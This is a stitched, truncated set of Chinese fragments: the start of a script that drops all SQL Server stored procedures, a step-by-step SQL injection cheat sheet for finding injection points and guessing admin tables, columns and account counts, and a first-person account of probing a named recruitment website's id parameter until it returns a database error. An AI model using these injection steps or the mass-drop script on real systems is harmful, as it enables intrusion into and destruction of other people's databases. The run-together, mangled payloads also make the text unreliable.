----------------------------------删除所有存储过程-----------------------------------declare @procName varchar(500)      declare cur cursor            for select [name] from sys.objects where type = p

SQL注射语句1.判断有无注入点 ; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0and 03.猜帐号数目 如果遇到0and 0and 14.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin

今天上了一个人才招聘网站，对他们的招聘系统我很感兴趣，aspx结尾的，看来是.net的程序，这样的网站会不会有什么漏洞呢?顺便打开一条消息 http://www.cnwill.com/NewsShow.aspx?id=4847 ，然后加一个 看看出现什么?我晕。。　　Source: .Net SqlClient Data Provider　　Description: 字符串 之前有